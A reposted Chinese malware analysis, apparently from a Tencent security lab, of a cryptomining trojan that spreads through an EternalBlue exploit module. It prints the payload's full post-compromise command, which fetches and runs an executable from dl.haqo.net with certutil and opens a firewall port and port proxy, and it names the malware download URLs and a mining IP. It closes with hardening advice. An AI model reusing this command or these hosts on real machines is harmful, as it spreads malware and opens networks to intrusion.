阻止电脑自动安装软件的方法 qqpcrtp是什么进程( 二 )


创建线程判断母体进程是否存在
调用OpenFileMappingA打开共享内存 , 读取共享内存数据
读取共享内存数据
调用RtlDecompressBuffer函数解压共享内存中的数据 , 为下一步执行做准备
解压共享内存数据
共享内存数据加压完后会执行 , 目前该shellcode主要功能挖矿,不排除后期会拉取其他更加恶意如加密勒索等木马病毒执行
执行shellcode
尝试挖矿时通信IP为172.105.204.237
2.3 攻击模块
攻击模块从地址hxxp://dl.haqo.net/eb.exez下载 , 作为子进程Svvhost.Exe启动 , 分析发现该文件是通过python实现的“永恒之蓝”漏洞利用模块压缩打包程序 。
子进程Svvhost.Exe为将python实现的“永恒之蓝”漏洞利用模块压缩打包程序 。
Mysmb.pyo为攻击时扫描代码 。
GitHub上也可以看到相关开源代码
扫描内网445端口进行攻击
不仅攻击内网漏洞机器 , 还随机找几个外网IP尝试攻击 , 1次攻击完后沉默20分钟
攻击成功后paylaod在中招机器执行以下命令进行内网扩散传播
cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53
安全建议1. 服务器暂时关闭不必要的端口(如135、139、445) , 方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html
2. 企业用户在周一上班后 , 建议使用腾讯御点查杀病毒(个人用户可使用腾讯电脑管家) , 然后使用漏洞修复功能 , 修复全网终端存在的系统高危漏洞;
3. 服务器使用高强度密码 , 切勿使用弱口令 , 防止黑客暴力破解;
4. 使用杀毒软件拦截可能的病毒攻击;
5. 推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击 。御界高级威胁检测系统 , 是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据 , 研发出的独特威胁情报和恶意检测模型系统 。


以上关于本文的内容,仅作参考!温馨提示:如遇健康、疾病相关的问题,请您及时就医或请专业人士给予相关指导!

「四川龙网」www.sichuanlong.com小编还为您精选了以下内容,希望对您有所帮助: